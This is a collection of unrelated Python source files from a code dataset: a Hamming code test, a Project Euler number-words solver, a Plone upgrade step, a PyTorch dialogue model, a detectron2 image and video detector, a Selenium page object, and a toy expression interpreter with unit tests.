open('lab2_data/hamming_15_11.txt')\n file_lines = f.readlines()\n f.close()\n print (len(file_lines))\n for line in file_lines:\n data = line.split(',')\n data[0], data[1] = data[0].strip(), data[1].strip()\n assert (hamming_decode(hamming_encode(data[0]) ) == data[0])\n assert (hamming_decode(hamming_encode(data[0]), 1) == data[0])\n assert (hamming_decode(hamming_encode(data[0]), 2) == False)\n # print (hamming_encode(data[0]))\n # assert (hamming_encode(data[0]) == data[1])\n # print (hamming_encode(data[0]))\n # print (hamming_decode(hamming_encode(data[0]), 1))\n # print (data[0])\n ","sub_path":"hamming_16_11_method2.py","file_name":"hamming_16_11_method2.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"538333639","text":"word_for = {\n 0 : \"\", \n 1 : \"one\", 2 : \"two\", 3 : \"three\",\n 4 : \"four\", 5 : \"five\", 6 : \"six\",\n 7 : \"seven\", 8 : 
\"eight\", 9 : \"nine\",\n 10 : \"ten\", 11 : \"eleven\", 12 : \"twelve\",\n 13 : \"thirteen\", 14 : \"fourteen\", 15 : \"fifteen\",\n 16 : \"sixteen\", 17 : \"seventeen\", 18 : \"eighteen\",\n 19 : \"nineteen\", 20 : \"twenty\", 30 : \"thirty\",\n 40 : \"forty\", 50 : \"fifty\", 60 : \"sixty\",\n 70 : \"seventy\", 80 : \"eighty\", 90 : \"ninety\" \n}\n\ndef two_digit_name(n):\n low = n % 10\n high = n - low\n return word_for[high] + word_for[low]\n\ndef three_digit_name(n):\n high = n // 100\n low = n % 100\n if low == 0:\n return word_for[high] + \"hundred\"\n else:\n return word_for[high] + \"hundredand\" + name_of(low)\n \ndef name_of(n):\n if n < 20:\n return word_for[n]\n elif n < 100:\n return two_digit_name(n)\n elif n < 1000:\n return three_digit_name(n)\n elif n == 1000:\n return \"onethousand\"\n else:\n none\n\ndef solution():\n names = map(name_of, range(1,1001))\n return sum(map(len, names))\n\nif __name__ == \"__main__\":\n print(solution())\n","sub_path":"src/p17.py","file_name":"p17.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"615136346","text":"from ftw.upgrade import UpgradeStep\nfrom opengever.inbox.forwarding import IForwarding\n\n\nFORWARDING_TASK_TYPE_ID = u'forwarding_task_type'\n\n\nclass SetTaskTypeForForwardingOnObjects(UpgradeStep):\n \"\"\"Set task_type for forwarding on objects.\n \"\"\"\n\n deferrable = True\n\n def __call__(self):\n query = {'object_provides': IForwarding.__identifier__}\n for obj in self.objects(query, 'Set task_type on forwarding objects'):\n # attributestorage, bypass field fallback to default\n task_type = obj.__dict__.get('task_type', None)\n if not task_type:\n obj.task_type = FORWARDING_TASK_TYPE_ID\n","sub_path":"opengever/core/upgrades/20200901163834_set_task_type_for_forwarding_on_objects/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"316219280","text":"import torch.nn as nn, torch, numpy as np, copy, pdb\nfrom torch.autograd import Variable\nuse_cuda = torch.cuda.is_available()\n\n\ndef max_out(x):\n # make sure s2 is even and that the input is 2 dimension\n if len(x.size()) == 2:\n s1, s2 = x.size()\n x = x.unsqueeze(1)\n x = x.view(s1, s2 // 2, 2)\n x, _ = torch.max(x, 2)\n\n elif len(x.size()) == 3:\n s1, s2, s3 = x.size()\n x = x.unsqueeze(1)\n x = x.view(s1, s2, s3 // 2, 2)\n x, _ = torch.max(x, 3)\n\n return x\n\n\n# encode each sentence utterance into a single vector\nclass BaseEncoder(nn.Module):\n def __init__(self, vocab_size, emb_size, hid_size, num_lyr, bidi):\n super(BaseEncoder, self).__init__()\n self.hid_size = hid_size\n self.num_lyr = num_lyr\n self.drop = nn.Dropout(0.3)\n self.direction = 2 if bidi else 1\n # by default they requires grad is true\n self.embed = nn.Embedding(vocab_size, emb_size, padding_idx=10003, sparse=False)\n self.rnn = nn.GRU(input_size=emb_size, hidden_size=hid_size,\n num_layers=num_lyr, bidirectional=bidi, batch_first=True)\n\n def forward(self, x, x_lens):\n bt_siz, seq_len = x.size(0), x.size(1)\n h_0 = Variable(torch.zeros(self.direction * self.num_lyr, bt_siz, self.hid_size), requires_grad=False)\n if use_cuda:\n x = x.cuda()\n h_0 = h_0.cuda()\n x_emb = self.embed(x)\n x_emb = self.drop(x_emb)\n x_emb = torch.nn.utils.rnn.pack_padded_sequence(x_emb, x_lens, batch_first=True)\n x_o, x_hid = self.rnn(x_emb, h_0)\n\n # move the batch to the front of 
the tensor\n x_hid = x_hid.view(x.size(0), -1, self.hid_size)\n\n \"\"\"\n base_ind = np.array([ti*seq_len for ti in range(bt_siz)])\n x_o, _ = torch.nn.utils.rnn.pad_packed_sequence(x_o, batch_first=True)\n x_o = x_o.contiguous().view(-1, self.hid_size)\n x_o = x_o[base_ind + x_lens - 1, :]\n x_o = x_o.unsqueeze(1)\n print((x_o == x_hid).all()) --> true\n \"\"\"\n\n return x_hid\n\n\n# encode the hidden states of a number of utterances\nclass SessionEncoder(nn.Module):\n def __init__(self, hid_size, inp_size, num_lyr, bidi):\n super(SessionEncoder, self).__init__()\n self.hid_size = hid_size\n self.num_lyr = num_lyr\n self.direction = 2 if bidi else 1\n self.rnn = nn.GRU(hidden_size=hid_size, input_size=inp_size,\n num_layers=num_lyr, bidirectional=bidi, batch_first=True)\n\n def forward(self, x):\n h_0 = Variable(torch.zeros(self.direction * self.num_lyr, x.size(0), self.hid_size), requires_grad=False)\n if use_cuda:\n h_0 = h_0.cuda()\n # output, h_n for output batch is already dim 0\n h_o, h_n = self.rnn(x, h_0)\n # move the batch to the front of the tensor\n # return h_o if you want to decode intermediate queries as well\n h_n = h_n.view(x.size(0), -1, self.hid_size)\n return h_o\n\n\n# decode the hidden state\nclass Decoder(nn.Module):\n def __init__(self, vocab_size, emb_size, ses_hid_size, hid_size, num_lyr=1, bidi=False, teacher=True):\n super(Decoder, self).__init__()\n self.emb_size = emb_size\n self.hid_size = hid_size\n self.num_lyr = num_lyr\n self.drop = nn.Dropout(0.3)\n self.tanh = nn.Tanh()\n self.in_embed = nn.Embedding(vocab_size, emb_size, padding_idx=10003, sparse=False)\n self.rnn = nn.GRU(hidden_size=2*hid_size, input_size=emb_size,\n num_layers=num_lyr, bidirectional=False, batch_first=True)\n\n self.lin1 = nn.Linear(ses_hid_size, hid_size)\n self.lin2 = nn.Linear(2*hid_size, 2*emb_size)\n self.lin3 = nn.Embedding(vocab_size, 2*emb_size, padding_idx=10003, sparse=False)\n self.out_embed = nn.Linear(emb_size, vocab_size, False)\n self.log_soft2 = nn.LogSoftmax(dim=2)\n self.direction = 2 if bidi else 1\n self.teacher_forcing = teacher\n\n def do_decode(self, siz, seq_len, ses_encoding, target=None):\n preds = []\n tok = Variable(torch.ones(siz, 1).long(), requires_grad=False)\n hid_n = ses_encoding\n if use_cuda:\n tok = tok.cuda()\n if target is not None:\n target = target.cuda()\n\n for i in range(seq_len):\n if target is not None:\n tok = target.select(1, i)\n tok = tok.unsqueeze(1)\n\n tok_vec = self.in_embed(tok)\n tok_vec = self.drop(tok_vec)\n hid_o, hid_n = self.rnn(tok_vec, torch.cat((hid_n, ses_encoding), 2))\n hid_n = hid_n[:, :, :self.hid_size]\n hid_o = self.lin2(hid_o) + self.lin3(tok)\n hid_o = max_out(hid_o)\n hid_o = self.out_embed(hid_o)\n preds.append(hid_o)\n\n op = self.log_soft2(hid_o)\n _, max_ind = torch.max(op, dim=2)\n tok = max_ind.clone()\n\n dec_o = torch.cat(preds, 1)\n return dec_o\n\n def forward(self, ses_encoding, x=None, x_lens=None, beam=5):\n ses_encoding = self.tanh(self.lin1(ses_encoding))\n # indicator that we are doing inference\n if x is None:\n n_candidates = []\n candidates = [([1], 0)]\n gen_len = 1\n while gen_len <= 10:\n for c in candidates:\n seq, score = c[0], c[1]\n _target = Variable(torch.LongTensor([seq]), requires_grad=False)\n dec_o = self.do_decode(1, len(seq), ses_encoding, _target)\n op = dec_o[:, -1, :]\n for i in range(op.size(1)):\n n_candidates.append((seq + [i], score + op.data[0, i]))\n # hack to exponent sequence length by alpha-0.7\n n_candidates.sort(key=lambda temp: temp[1] / 
(1.0*len(temp[0])**0.7), reverse=True)\n candidates = copy.copy(n_candidates[:beam])\n n_candidates[:] = []\n gen_len += 1\n\n return candidates\n else:\n if use_cuda:\n x = x.cuda()\n siz, seq_len = x.size(0), x.size(1)\n ses_encoding = ses_encoding.view(self.num_lyr*self.direction, siz, self.hid_size)\n dec_o = self.do_decode(siz, seq_len, ses_encoding, x if self.teacher_forcing else None)\n return dec_o\n\n def set_teacher_forcing(self, val):\n self.teacher_forcing = val\n","sub_path":"modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"29103699","text":"from detectron2.engine import DefaultPredictor\r\nfrom detectron2.config import get_cfg\r\nfrom detectron2.data import MetadataCatalog\r\nfrom detectron2.utils.visualizer import ColorMode,Visualizer\r\nfrom detectron2 import model_zoo\r\n\r\n\r\nimport cv2\r\nimport numpy\r\n\r\n\r\nclass Detector:\r\n def __init__(self,model_type = \"OD\"):\r\n self.cfg = get_cfg()\r\n self.model_type = model_type\r\n\r\n #Load model and pretrained model\r\n if model_type == \"OD\":\r\n #Object detection\r\n\r\n self.cfg.merge_from_file(model_zoo.get_config_file(\"COCO-Detection/faster_rcnn_R_101_FPN_3x.yaml\"))\r\n self.cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(\"COCO-Detection/faster_rcnn_R_101_FPN_3x.yaml\")\r\n\r\n elif model_type == \"IS\": # Instance segmentation\r\n self.cfg.merge_from_file(model_zoo.get_config_file(\"COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml\"))\r\n self.cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(\"COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml\")\r\n\r\n elif model_type == \"PS\" : #Panoptic segmentation\r\n\r\n self.cfg.merge_from_file(model_zoo.get_config_file(\"COCO-PanopticSegmentation/panoptic_fpn_R_101_3x.yaml\"))\r\n self.cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(\"COCO-PanopticSegmentation/panoptic_fpn_R_101_3x.yaml\")\r\n\r\n\r\n\r\n\r\n self.cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.7\r\n self.cfg.MODEL.DEVICE = 'cpu'\r\n\r\n self.predictor = DefaultPredictor(self.cfg)\r\n\r\n def onImage(self,imagePath):\r\n image = cv2.imread(imagePath)\r\n if self.model_type != \"PS\":\r\n\r\n prediction = self.predictor(image)\r\n\r\n viz = Visualizer(image[:,:,::-1],metadata=MetadataCatalog.get(self.cfg.DATASETS.TRAIN[0]),\r\n instance_mode= ColorMode.IMAGE)\r\n output = viz.draw_instance_predictions(prediction[\"instances\"].to(\"cpu\"))\r\n\r\n else :\r\n prediction,segmentInfo = self.predictor(image)[\"panoptic_seg\"]\r\n viz = Visualizer(image[:,:,::-1],MetadataCatalog.get(self.cfg.DATASETS.TRAIN[0]))\r\n output = viz.draw_panoptic_seg_predictions(prediction.to(\"cpu\"),segmentInfo)\r\n cv2.imshow(\"Result\",output.get_image()[:,:,::-1])\r\n cv2.waitKey(0)\r\n\r\n\r\n def onVideo(self,videopath):\r\n cap = cv2.VideoCapture(videopath)\r\n\r\n if (cap.isOpened()==False):\r\n print(\"Error opening the file..\")\r\n return\r\n (sucess, image ) = cap.read()\r\n\r\n while sucess :\r\n if self.model_type != \"PS\":\r\n\r\n prediction = self.predictor(image)\r\n\r\n viz = Visualizer(image[:, :, ::-1], metadata=MetadataCatalog.get(self.cfg.DATASETS.TRAIN[0]),\r\n instance_mode=ColorMode.IMAGE)\r\n output = viz.draw_instance_predictions(prediction[\"instances\"].to(\"cpu\"))\r\n\r\n else:\r\n prediction, segmentInfo = self.predictor(image)[\"panoptic_seg\"]\r\n viz = Visualizer(image[:, :, ::-1], MetadataCatalog.get(self.cfg.DATASETS.TRAIN[0]))\r\n output = 
viz.draw_panoptic_seg_predictions(prediction.to(\"cpu\"), segmentInfo)\r\n cv2.imshow(\"Result\", output.get_image()[:, :, ::-1])\r\n\r\n key = cv2.waitKey(1) & 0xFF\r\n if key == ord(\"q\"):\r\n break\r\n (sucess,image) = cap.read()\r\n\r\n\r\n","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"159787845","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*-\nfrom time import sleep\n\nfrom common.basePage import BasePage\n\n\nclass GroupPage(BasePage):\n # activity center\n # operations\n activity_button = ('xpath', '//*[@id=\"menu\"]/div/ul/li[13]/div')\n user_click = ('xpath', '//*[@id=\"menu\"]/div/ul/li[13]/ul/li[1]')\n\n # user group - add\n add_button = ('xpath', '//*[@id=\"home\"]/div[3]/div/div/div[1]/div[2]/div[2]/button')\n group_name_input = ('xpath', '//*[@id=\"userGroupDetail-warp\"]/div/div/div[2]/div[1]/input')\n condition_1_click = ('xpath', '//*[@id=\"userGroupDetail-warp\"]/div/div/div[2]/div[4]/div[2]/span[2]')\n condition_2_click = ('xpath', '//*[@id=\"userGroupDetail-warp\"]/div/div/div[2]/div[4]/div[3]/span[3]')\n condition_3_click = ('xpath', '//*[@id=\"userGroupDetail-warp\"]/div/div/div[2]/div[4]/div[4]/span[2]')\n int_input = ('xpath', '//*[@id=\"userGroupDetail-warp\"]/div/div/div[2]/div[5]/div/div[3]/div/input')\n save_button = ('xpath', '//*[@id=\"home\"]/div[3]/div/div/div[2]/div/button[2]/span')\n save_true_button = ('xpath', '/html/body/div[2]/div/div[3]/button[2]/span')\n\n # user group - edit\n edit_click = (\n 'xpath', '//*[@id=\"home\"]/div[3]/div/div/div[2]/div/div[3]/table/tbody/tr[1]/td[8]/div/button[1]/span')\n clear_button = ('xpath', '//*[@id=\"userGroupDetail-warp\"]/div/div/div[2]/div[5]/h3/a')\n\n # user group - delete\n delete_click = (\n 'xpath', '//*[@id=\"home\"]/div[3]/div/div/div[2]/div/div[3]/table/tbody/tr[1]/td[8]/div/button[2]/span')\n\n # validation message box\n check = ('class name', 'el-message__group')\n\n def add_group(self,group_name,number):\n # self.click(self.user_click)\n self.click(self.add_button)\n sleep(0.5)\n self.sendKeys(self.group_name_input, text=group_name)\n self.click(self.condition_1_click)\n self.click(self.condition_2_click)\n self.click(self.condition_3_click)\n self.sendKeys(self.int_input, text=number)\n self.click(self.save_button)\n sleep(0.5)\n\n def edit_group(self, group_name,number):\n self.click(self.edit_click)\n sleep(0.5)\n self.clear(self.group_name_input)\n self.sendKeys(self.group_name_input, text=group_name)\n self.click(self.clear_button)\n self.click(self.condition_1_click)\n self.click(self.condition_2_click)\n self.click(self.condition_3_click)\n self.sendKeys(self.int_input, text=number)\n self.click(self.save_button)\n sleep(0.5)\n\n def delete_group(self):\n self.click(self.delete_click)\n self.click(self.save_true_button)\n sleep(1)\n","sub_path":"pages/crm/user_groupPage.py","file_name":"user_groupPage.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"267527159","text":"# -*- coding: UTF-8 -*-\n# http://www.pythontutor.com/\n# python.exe -m doctest stackFrame.py # stackFrame.py is argv to doctest.script\n# from __future__ import print_function\n
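# --- Illustrative note (added; not part of the original exercise) ---\n# The @trace decorator defined below prints an indented call tree. A tiny\n# usage sketch (hypothetical function, shown as a comment only):\n#\n# @trace\n# def fib(n):\n# return n if n < 2 else fib(n - 1) + fib(n - 2)\n#\n# fib(3) then logs each nested call, indented by recursion depth.\n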
import argparse\n\nimport re\nimport functools\nPREFIX = ''\ndef trace(fn):\n \"\"\"A decorator that prints a function's name, its arguments, and its return\n values each time the function is called. For example,\n\n @trace\n def compute_something(x, y):\n # function body\n \"\"\"\n @functools.wraps(fn)\n def wrapped(*args, **kwds):\n global PREFIX\n reprs = [repr(e) for e in args] \n reprs += [repr(k) + '=' + repr(v) for k, v in kwds.items()]\n log('{0}({1})'.format(fn.__name__, ', '.join(reprs)) + ':')\n PREFIX += ' '\n try:\n result = fn(*args, **kwds)\n PREFIX = PREFIX[:-4]\n except Exception as e:\n log(fn.__name__ + ' exited via exception')\n PREFIX = PREFIX[:-4]\n raise\n # Here, print out the return value.\n #log('{0}({1}) -> {2}'.format(fn.__name__, ', '.join(reprs), result))\n log('-> {0}'.format(result,))\n return result\n return wrapped\n \ndef log(message):\n \"\"\"Print an indented message (used with trace).\"\"\"\n if type(message) is not str:\n message = str(message)\n print(PREFIX + re.sub('\\n', '\\n' + PREFIX, message))\n\nisa = isinstance\n \ndef tokenize(s):\n '''\n \"Convert a string into a list of tokens.\"\n \n >>> tokenize('(+(* 3 4)5)') # there must be a space after >>>, and the line below must line up exactly with the first >\n ['(', '+', '(', '*', '3', '4', ')', '5', ')']\n '''\n return s.replace('(',' ( ').replace(')',' ) ').split()\n\ndef atom(token):\n\t\"Numbers become numbers; every other token is a symbol.\"\n\ttry: return int(token)\n\texcept ValueError:\n\t\ttry: return float(token)\n\t\texcept ValueError:\n\t\t\tif '/' in token:\n\t\t\t\tnum,deno = token.split('/')\n\t\t\t\treturn Fraction(num,deno)\n\t\t\telif 'i' in token and '+' in token:\n##\t\t\t\ttemp = eval(token.replace('i', 'j', 1))#try: return complex(token.replace('i', 'j', 1))\n\t\t\t\ttemp = token.replace('i', 'j', 1)\n\t\t\t\treal,image = token.split('+')\n\t\t\t\ttemp = MComplex(real,image[:-1])\n\t\t\t\tif isa(temp,MComplex): # isa and type return SAME for primitive type including complex\n\t\t\t\t\treturn temp\n\t\t\t\telse:\n\t\t\t\t\treturn str(token)\n\t\t\telse:\n\t\t\t\treturn (Variable(token) )\n \ndef printTreeIndented(tree, level=0):\n if tree == None: return\n printTreeIndented(tree.right, level+1)\n print (' '*level + str(tree.cargo))\n printTreeIndented(tree.left, level+1)\n \ndef CreateTree(code):\n print (code.replace('(',' ( ').replace(')',' ) '))\n tokens = tokenize(code)\n print (tokens)\n ast = reCreateTree(tokens)\n #printTreeIndented(ast)\n return ast\n@trace\ndef reCreateTree(tokens):\n if len(tokens) == 0:\n raise SyntaxError('unexpected EOF while reading')\n result = None\n token = tokens.pop(0)\n if '(' == token:\n op= tokens.pop(0)\n result = Add() if op == '+' else ( Multiply(op) if op == '*' else \\\n LessThan() if op == '<' else \\\n If() if op == 'if' else \\\n While() if op == 'while' else Tree(op))\n \n if isa(result,If):\n result.condition = reCreateTree(tokens)\n result.consequence = reCreateTree(tokens)\n result.alternative = reCreateTree(tokens)\n elif isa(result,While):\n result.condition = reCreateTree(tokens)\n result.body = reCreateTree(tokens) \n \n else:\n if '(' == tokens[0]:\n result.left = reCreateTree(tokens)\n else:\n result.left = Tree(atom(tokens.pop(0)))\n if '(' == tokens[0]:\n result.right = reCreateTree(tokens)\n else:\n result.right = Tree(atom(tokens.pop(0)))\n if ')' != tokens.pop(0) :\n raise SyntaxError('unexpected )')\n return result\n\ndef GeneraTree(neList):\n result = Tree(neList[0] )\n if isa(neList[1], str) or isa(neList[1], int) or isa(neList[1], MComplex) or isa(neList[1], Fraction):\n result.left = (Tree( neList[1]))\n else:\n result.left= GeneraTree(neList[1])\n if isa(neList[2], str)or isa(neList[2], int) or isa(neList[2], MComplex) or isa(neList[2], Fraction):\n result.right = 
\ndef GeneraTree(neList):\n    result = Tree(neList[0] )\n    if isa(neList[1], str) or isa(neList[1], int) or isa(neList[1], MComplex) or isa(neList[1], Fraction):\n        result.left = (Tree( neList[1]))\n    else:\n        result.left= GeneraTree(neList[1])\n    if isa(neList[2], str)or isa(neList[2], int) or isa(neList[2], MComplex) or isa(neList[2], Fraction):\n        result.right = (Tree( neList[2]))\n    else:\n        result.right= GeneraTree(neList[2])\n    return result    \n    \nclass CommonEqualityMixin(object):\n\n    def __eq__(self, other):\n        return (isinstance(other, self.__class__)\n            and self.__dict__ == other.__dict__)\n\n    def __ne__(self, other):\n        return not self.__eq__(other)\n    \nclass Fraction(object):# if not inheriting from object (old-style class), type() of an instance returns <type 'instance'> and type(Fraction) is <type 'classobj'>,\n# while if there is object (new-style class), type(Fraction) is <type 'type'>\n    def __init__(self, num, den=1):\n        self.num = int(num)\n        self.den = int(den)\n    def __str__(self):\n        return \"%d///%d\" % (self.num, self.den)\n\n    def __repr__(self):\n        return \"%d//%d\" % (self.num, self.den)\n    \n    def __mul__(self, object):# risky: the parameter shadows the builtin name 'object' (LEGB lookup)\n        return Fraction(self.num*object.num, self.den*object.den)\n    #__rmul__ = __mul__\n    def __add__(self, other):\n        if type(other) == type(5):\n            other = Fraction(other)\n        return Fraction(self.num * other.den +\\\nself.den * other.num,\\\nself.den * other.den)\n    __radd__ = __add__\n    \n    def __sub__(self,other):\n        if isinstance(other,type(5)): # naming this parameter 'object' would be a bug: 'object' still resolves via LEGB, but the if test would always be False\n            other = Fraction(other)\n        return Fraction(self.num * other.den - self.den * other.num,self.den * other.den)\n    \n# how to write one logical line across multiple physical lines\n\n# how to use semicolons to put several logical lines on one physical line\n##a = Fraction(1,3);b = Fraction(1,2);print a + b \n\n\nclass MComplex(object): #\n\tdef __init__(self,real,imag=0):\n\t\tself.real = float(real)\n\t\tself.imag = float(imag)\n\tdef __repr__(self):\n\t\treturn \"MComplex(%s,%s)\" % (self.real, self.imag)\n\tdef __str__(self):\n\t\treturn \"(%g+%gi)\" % (self.real, self.imag)\n\t# self + other\n\tdef __add__(self,other):\n\t\treturn MComplex(self.real + other.real, self.imag + other.imag)\n# self - other\n\tdef __sub__(self,other):\n\t\treturn MComplex(self.real - other.real, self.imag - other.imag)\n\t#def __mul__(self, object):\n\t#\traise\n \nclass Tree(CommonEqualityMixin):\n    def __init__(self, cargo, left=None, right=None):\n        self.cargo = cargo\n        self.left = left\n        self.right = right\n\n    def __str__(self):\n        #return '<%s>' % (str(self.cargo),)\n        #return '{0}: {1}'.format(self.__class__,str(self.cargo),)\n        return ' ( {0} {1} {2} ) '.format(str(self.cargo)*3,repr(self.left),repr(self.right),) if self.left is not None else str(self.cargo) \n    def __repr__(self):\n        return ' ( {0} {1} {2} ) '.format(str(self.cargo)*2,repr(self.left),repr(self.right),) if self.left is not None else str(self.cargo)\n    @trace    \n    def eval(self,env):# a Tree(1) conveniently returns Python's int 1 here, but a Boolean cargo would go wrong\n        return self.cargo if not ( isa(self.cargo, Variable)) else self.cargo.eval(env)\n    \nclass Add(Tree):\n    \"\"\" Addition operator class.\n    \"\"\"\n    def __init__(self, left=None, right=None):\n        super().__init__(left = left,right = right,cargo = '+')\n    \n    @trace    \n    def eval(self,env):\n        return self.left.eval(env) + self.right.eval(env) #Number.new(left.evaluate(environment).value + right.evaluate(environment).value)\n\n    \n\n    \nclass Let(Tree):\n    \"\"\" Let binding: introduces a new variable in the environment.\n    \"\"\"\n    def __init__(self, left=None, right=None):\n        super().__init__(left = left,right = right,cargo = 'let')\n    @trace    \n    def eval(self,env):\n        if self.left not in env:\n            env[self.left] = self.right.eval(env) \n        else: raise \n    \nclass Set(Tree):\n    \"\"\" Set assignment: rebinds an existing variable in the environment.\n    \"\"\"\n    def __init__(self, left=None, right=None):\n        super().__init__(left = left,right = right,cargo = 'set')\n    \n    @trace    \n    def eval(self,env):\n        if self.left in env:\n            env[self.left] = self.right.eval(env) \n        else: raise 
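# (Added note, not in the original: Let/Set key the environment dict by the left-hand node itself; because CommonEqualityMixin defines __eq__ without __hash__, Tree instances are unhashable in Python 3, so these bindings only work when self.left is a hashable value such as a plain string.)\n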
    \nclass Machine(object):\n    \"\"\" Virtual machine.\n    \"\"\"\n    def __init__(self, environment):\n        self.env = environment\n    \n    def RunCode(self, code):\n        result = code.eval(self.env)\n        print(result); import pprint; pprint.pprint(self.env)\n        return result\n    \nclass Multiply(Tree):\n    \"\"\" Multiplication operator class.\n    \"\"\"\n    def __init__(self, left=None, right=None):\n        super().__init__('*', left, right) \n\nclass Boolean(CommonEqualityMixin):\n    \"\"\" Boolean value type.\n    \"\"\"\n    def __init__(self, value):\n        self.value = value\n\n    def __repr__(self):\n        return 'true' if self.value else 'false'\n\n    def __str__(self):\n        return str(self.value)\n    \n    def __add__(self,other):\n        return Boolean(self.value or other.value )\n\nclass Variable(object):\n    \"\"\" Variable symbol class.\n    \"\"\"\n    def __init__(self, name):\n        self.name = name\n    \n    @trace\n    def eval(self,env):\n        print(self.name)\n        print('var called env')\n        return env[self.name] \n    \nclass If(object):\n    \"\"\" Implementation of the if control statement.\n    \"\"\"\n    def __init__(self, condition=None, consequence=None, alternative=None):\n        self.condition = condition\n        self.consequence = consequence\n        self.alternative = alternative    \n\n    @trace\n    def eval(self,env):\n        cond = self.condition.eval(env); print (cond)\n        if cond == Boolean(True):\n            return self.consequence.eval(env)\n        elif cond == Boolean(False):\n            return self.alternative.eval(env)\n    \n    def __repr__(self):\n        return '( if {0} {1} {2} )'.format(repr(self.condition),repr(self.consequence),repr(self.alternative),)\n\n    def __str__(self):\n        return 'if statement'    \n    \nclass While(object):\n    def __init__(self, condition=None, body=None):\n        self.condition = condition\n        self.body = body\n\n    def eval(self,env):\n        if self.condition.eval(env).value == Boolean(True).value:\n            self.body.eval(env)  # evaluate the body, then loop by re-checking the condition\n            return self.eval(env)\n        elif self.condition.eval(env).value == Boolean(False).value:\n            return \n    \n    def __repr__(self):\n        return '( while {0} {1} )'.format(repr(self.condition),repr(self.body),)\n\n    def __str__(self):\n        return 'while statement'    \n    \n    \nclass LessThan(Tree):\n    \"\"\" Less-than operator class.\n    \"\"\"\n    def __init__(self, left=None, right=None):\n        super().__init__(left = left,right = right,cargo = '<')    \n    @trace\n    def eval(self,env):\n        return Boolean(self.left.eval(env) < self.right.eval(env))#Number.new(left.evaluate(environment).value + right.evaluate(environment).value)\n    \n@trace\ndef evalTree(t):\n    if t.cargo == '+':\n        return evalTree(t.left) + evalTree(t.right)\n    elif t.cargo == '*':\n        return evalTree(t.left) * evalTree(t.right)\n    elif t.cargo == '-':\n        return evalTree(t.left) - evalTree(t.right)    \n    else:\n        return t.cargo\n    \n\n\n## UnitTest\nimport unittest\nglobal_env = {}\nclass TestCName(unittest.TestCase):\n    def setUp(self):\n        # Perform set up actions (if any)\n        #print('\nsetUp called')\n        pass\n    def tearDown(self):\n        # Perform clean-up actions (if any)\n        #print('tearDown', 'called')\n        pass\n    \n    def testLessThanAsCondFalse(self):\n        #print('testLessThanAsCondFalse', 'called')\n        self.assertEqual(CreateTree(' ( if (< 3 2 ) (+ 1 2 ) (+ 3 4))').eval(global_env), 7)\n    def testLessThanAsCondTrue(self):\n        self.assertEqual(CreateTree(' ( if (< 1 2 ) (+ 1 2 ) (+ 3 4))').eval(global_env), 3)\n    def testLessThanAsCondTrueV(self):\n        self.assertEqual(CreateTree(' ( if (< 1 2 ) (+ a 2 ) (+ 3 4))').eval({'a':3}), 5)    \n    def testLessThanAsValue(self):# this passes, but the True branch of < 1 2 is never actually exercised\n        self.assertEqual( CreateTree(' ( if (< 1 2 ) (+ (< 3 2) (< 3 1))(+ 1 2))') .eval(global_env), Boolean(False))    \n\n    \n# python.exe -m doctest diGuiXiaJian.py    \ndef _test():\n    import doctest\n    doctest.testmod()\n\n##################### \n# CreateTree('(* 5 (+ 1 2 ))')\n\nCreateTree(' (+ a 2 )') .eval({'a':1})\n
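# (Added note, not in the original: the call above parses to Add(Tree(Variable('a')), Tree(2)) and evaluates to 3 under the environment {'a': 1}; the result is simply discarded because it is never printed.)\n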
\n#############################################\nif __name__ == \"__main__\":\n    unittest.main()\n#following won't be called \nCreateTree('(* 5 (+ 1 2 ))')\nCreateTree('(3 5 (4 1 2 ))')\nCreateTree('( +( * 5 1) 2 )')\nTree('+', Tree(1),Tree(2)) == Tree('+', Tree(1),Tree(2))\nTree('*',Tree(5), Tree('+',Tree(1),Tree(2)))\nTree('*', Tree('+',Tree(1),Tree(2)),Tree(5))\nCreateTree('(* 5 (+ 1 2 ))') == Tree('*', Tree('+',Tree(1),Tree(2)),Tree(5))\n\nCreateTree('(* 5 (+ 1 2 ))') == Tree('*',Tree(5), Tree('+',Tree(1),Tree(2)))#true\nCreateTree('(* 5 (+ 1 2 ))') == Tree('*',Tree(5), Add(Tree(1),Tree(2)))#true\nCreateTree('(* 5 (+ 1 2 ))') == Multiply(Tree(5), Add(Tree(1),Tree(2)))#true\n\nCreateTree('( * ( + 7 ( * ( * 4 6) ( + 8 9 ) ) ) 5 )') \nCreateTree('(* 5 (+ 1 2 ))')\n\nevalTree( CreateTree('( * ( + 7 ( * ( * 4 6) ( + 8 9 ) ) ) 5 )') )\nevalTree( CreateTree('(* 5 (+ 1 2 ))') )\nevalTree( Tree('*',Tree(5), Tree('+',Tree(1),Tree(2))) )\nevalTree( Multiply(Tree(5), Add(Tree(1),Tree(2))) )\n\nCreateTree(' (* 3 2 )').eval(env)\n\n\n# the two outputs below differ, because Multiply has no eval of its own and falls back to the parent class's eval; the @trace output differs too, since the arguments are shown with repr while the value after -> uses __str__\nCreateTree('(* 5 (* 3 2 ))').eval(env)\nCreateTree('(+ 7(+ 3 2 ))').eval(env)\nCreateTree('(+ 7(+ 6/3 2 ))').eval(env)# the outer + needs __radd__\nCreateTree('(- 18/3 2)').eval(env)\nCreateTree('(* 5 (+ 1 2 ))').eval(env) # this one never descends at all; no downward call is made at the entry point\nCreateTree('(+ 5 (* 1 2 ))').eval(env) # this one is interesting for understanding recursive descent: the 